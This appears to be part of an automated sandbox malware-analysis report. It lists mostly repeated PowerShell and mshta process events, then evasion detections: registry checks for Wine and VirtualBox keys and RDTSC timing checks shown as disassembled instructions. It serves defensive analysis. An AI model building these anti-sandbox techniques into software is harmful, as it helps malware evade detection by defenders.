                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-92296
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3780E0 second address: 3780E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 364824 second address: 364829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377160 second address: 377174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377174 second address: 377194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F4784F102CCh 0x0000000b pop edx 0x0000000c push eax 0x0000000d jmp 00007F4784F102CAh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377194 second address: 37719A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377302 second address: 377306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377306 second address: 377312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377639 second address: 377660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4784F102C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4784F102C6h 0x00000013 jmp 00007F4784F102D4h 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377660 second address: 37766E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37766E second address: 377674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37791A second address: 37791E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37791E second address: 377952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102D6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 377952 second address: 37796F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3792CA second address: 3792DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3792DE second address: 3792E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3792E4 second address: 37932B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4784F102C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4784F102D8h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F4784F102CDh 0x00000021 mov eax, dword ptr [eax] 0x00000023 jo 00007F4784F102CEh 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3793CF second address: 3793D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3793D3 second address: 379460 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4784F102C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F4784F102D5h 0x00000013 push 00000000h 0x00000015 and edi, 3625E200h 0x0000001b call 00007F4784F102C9h 0x00000020 pushad 0x00000021 jmp 00007F4784F102CBh 0x00000026 jmp 00007F4784F102D0h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f js 00007F4784F102C6h 0x00000035 pop ebx 0x00000036 pop edx 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push ebx 0x0000003c pushad 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 pop ebx 0x00000043 mov eax, dword ptr [eax] 0x00000045 jmp 00007F4784F102D6h 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e pushad 0x0000004f push esi 0x00000050 pushad 0x00000051 popad 0x00000052 pop esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379460 second address: 379464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 379598 second address: 37959C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 37959C second address: 3795A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3795A0 second address: 3795D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4784F102CBh 0x0000000c jmp 00007F4784F102D6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop esi 0x0000001a rdtsc
